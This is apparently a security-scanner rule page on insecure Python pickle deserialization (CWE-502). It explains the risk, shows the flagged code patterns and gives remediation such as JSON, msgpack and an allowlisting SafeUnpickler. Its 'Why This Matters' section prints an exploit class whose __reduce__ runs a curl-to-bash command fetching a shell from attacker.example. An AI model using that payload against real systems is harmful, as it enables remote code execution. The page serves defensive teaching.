VNX-PY-003 – Insecure Deserialization with pickle

Overview

This rule flags calls to pickle.load(), pickle.loads(), cPickle.load(), and cPickle.loads(). The Python pickle format is a bytecode stream for a stack-based virtual machine. When Python deserializes a pickle stream it executes the bytecode, which means a malicious pickle payload can run arbitrary Python code — including importing modules, calling functions, and executing system commands — before your application logic ever sees the data. There is no option to safely load an untrusted pickle. This maps to CWE-502: Deserialization of Untrusted Data.
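To make the "bytecode for a virtual machine" description concrete, the standard-library pickletools module can disassemble a pickle without executing it. The sketch below is illustrative only: the Greeter class is a hypothetical, harmless stand-in that asks the unpickler to call print, and the protocol is pinned to 4 so the opcode names are predictable.

```python
import io
import pickle
import pickletools


class Greeter:
    """Hypothetical, harmless stand-in: asks the unpickler to call print("hello")."""

    def __reduce__(self):
        return (print, ("hello",))


payload = pickle.dumps(Greeter(), protocol=4)

# pickletools.dis only decodes the opcodes; it never executes them.
buffer = io.StringIO()
pickletools.dis(payload, out=buffer)
listing = buffer.getvalue()
print(listing)
```

In the listing, STACK_GLOBAL resolves builtins.print by name and REDUCE calls it with the argument tuple. Those same two opcodes are all an attacker needs to reach any importable callable.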

Severity: High | CWE: CWE-502 – Deserialization of Untrusted Data

Why This Matters

Pickle-based remote code execution is trivial to exploit. An attacker only needs to define a class whose __reduce__ method returns a callable and a tuple of arguments. When Python deserializes the resulting stream, the unpickler calls that callable with those arguments automatically:

# What a malicious pickle payload looks like when crafted
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl https://attacker.example/shell | bash",))

payload = pickle.dumps(Exploit())
# Anyone calling pickle.loads(payload) executes the shell command

This payload is under 100 bytes and embeds easily in any data channel that uses pickle: file uploads, API responses, Redis cache entries, message queue messages, or ML model files. Unlike SQL injection or XSS, there is no input validation or escaping that makes pickle safe, because the code executes during loading, before your application can inspect the data.
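A harmless variant of the payload makes this behavior observable without running a shell command. This is a minimal sketch: the Probe class is hypothetical and swaps os.system for os.getcwd, which has no side effects.

```python
import os
import pickle


class Probe:
    """Hypothetical, harmless stand-in for the exploit: calls os.getcwd."""

    def __reduce__(self):
        return (os.getcwd, ())


payload = pickle.dumps(Probe())
result = pickle.loads(payload)

# The unpickler called os.getcwd() and handed back its return value,
# so the caller receives a str, not a Probe instance.
print(type(result).__name__, result == os.getcwd())
```

The caller of pickle.loads never gets a chance to veto the call: by the time a value is returned, the function has already run.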

What Gets Flagged

Any .py file containing pickle.load(, pickle.loads(, cPickle.load(, or cPickle.loads(.

# FLAGGED: loading from a file
with open("data.pkl", "rb") as f:
    obj = pickle.load(f)

# FLAGGED: loading from a network response
obj = pickle.loads(response.content)

# FLAGGED: loading from Redis cache
obj = pickle.loads(redis_client.get("session:" + session_id))

# FLAGGED: cPickle (the Python 2 C implementation of pickle) is equally unsafe
import cPickle
obj = cPickle.loads(data)

Remediation

  1. Replace pickle with a safe serialization format. For plain data (dicts, lists, strings, numbers), JSON or MessagePack covers most use cases without any code execution on load:

import json

# SAFE: serialize to JSON
serialized = json.dumps({"key": "value", "count": 42})

# SAFE: deserialize from JSON — no code execution possible
data = json.loads(serialized)

import msgpack  # pip install msgpack

# SAFE: compact binary format, no code execution
serialized = msgpack.packb({"key": "value"})
data = msgpack.unpackb(serialized, raw=False)
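When the pickled value is a custom object rather than a plain dict, the same approach still works if the object is converted to and from plain data explicitly. The following is a sketch under assumptions: the UserProfile fields and the dump_profile/load_profile helpers are hypothetical names chosen for illustration.

```python
import json
from dataclasses import asdict, dataclass


@dataclass
class UserProfile:
    # Hypothetical fields, chosen only for illustration.
    name: str
    visits: int


def dump_profile(profile: UserProfile) -> str:
    """Serialize to JSON text; only plain data leaves the process."""
    return json.dumps(asdict(profile))


def load_profile(text: str) -> UserProfile:
    """Rebuild the object from explicitly named, type-checked fields."""
    raw = json.loads(text)
    if not isinstance(raw, dict):
        raise ValueError("expected a JSON object")
    name, visits = raw.get("name"), raw.get("visits")
    # bool is a subclass of int, so reject it explicitly.
    if not isinstance(name, str) or not isinstance(visits, int) or isinstance(visits, bool):
        raise ValueError("unexpected field types")
    return UserProfile(name=name, visits=visits)


restored = load_profile(dump_profile(UserProfile(name="ada", visits=3)))
```

The loader decides which class to build and which fields to accept; the input only supplies values, so a malformed or hostile document can at worst raise an error.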
  2. If you must use pickle on data you do not control, implement a SafeUnpickler. Overriding find_class restricts which globals (classes and functions) the pickle stream may reference, so only names you explicitly allow can be resolved during deserialization:

import pickle
import io

SAFE_CLASSES = {
    ("builtins", "list"),
    ("builtins", "dict"),
    ("myapp.models", "UserProfile"),
}

class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in SAFE_CLASSES:
            raise pickle.UnpicklingError(
                f"Forbidden class: {module}.{name}"
            )
        return super().find_class(module, name)

# SAFER (but still prefer JSON): load with class allowlist
obj = SafeUnpickler(io.BytesIO(data)).load()
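The effect of the allowlist can be checked with a harmless probe. This sketch repeats the SafeUnpickler pattern with a smaller allowlist so that it runs on its own; the Probe class and the safe_loads helper are hypothetical names, and os.getcwd stands in for a dangerous callable.

```python
import collections
import io
import os
import pickle

SAFE_CLASSES = {("collections", "OrderedDict")}


class SafeUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) not in SAFE_CLASSES:
            raise pickle.UnpicklingError(f"Forbidden class: {module}.{name}")
        return super().find_class(module, name)


def safe_loads(data: bytes):
    """Hypothetical helper: unpickle bytes through the allowlist."""
    return SafeUnpickler(io.BytesIO(data)).load()


class Probe:
    """Harmless stand-in for an exploit: asks the unpickler to call os.getcwd."""

    def __reduce__(self):
        return (os.getcwd, ())


# An allowlisted class passes through find_class and loads normally.
ok = safe_loads(pickle.dumps(collections.OrderedDict(a=1)))

# The probe references a callable that is not allowlisted, so loading fails
# before the callable is ever invoked.
try:
    safe_loads(pickle.dumps(Probe()))
    blocked = False
except pickle.UnpicklingError as exc:
    blocked = True
    reason = str(exc)
```

Every entry in the allowlist widens what a crafted stream can construct, so keep it as small as the data model allows.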
  3. For ML model files, use a format designed for safety. See VNX-PY-013 for detailed guidance on torch.load(..., weights_only=True) and SafeTensors.

  4. Audit existing pickle usage. Search for all import pickle and import cPickle statements in your codebase, including from pickle import ... forms, to find every place data is written to or read back from pickle. Both the write and read sides need to be assessed.
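One way to run such an audit is to walk each file's syntax tree, which also catches aliased and from-style imports that a plain text search for "import pickle" can miss. This is a minimal sketch, not part of the rule itself: find_pickle_imports is a hypothetical helper, and because it uses the Python 3 parser it raises SyntaxError on Python 2-only source.

```python
import ast

PICKLE_MODULES = {"pickle", "cPickle"}


def find_pickle_imports(source: str, filename: str = "<string>"):
    """Return (line, statement kind, module) for each pickle/cPickle import."""
    hits = []
    for node in ast.walk(ast.parse(source, filename=filename)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name in PICKLE_MODULES:
                    hits.append((node.lineno, "import", alias.name))
        elif isinstance(node, ast.ImportFrom) and node.module in PICKLE_MODULES:
            hits.append((node.lineno, "from-import", node.module))
    return sorted(hits)


sample = "import json\nimport pickle as pk\nfrom pickle import loads\n"
hits = find_pickle_imports(sample)
print(hits)
```

Each hit marks a file to review by hand: check where the data being loaded comes from and whether the matching dump side can be moved to a safer format.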

References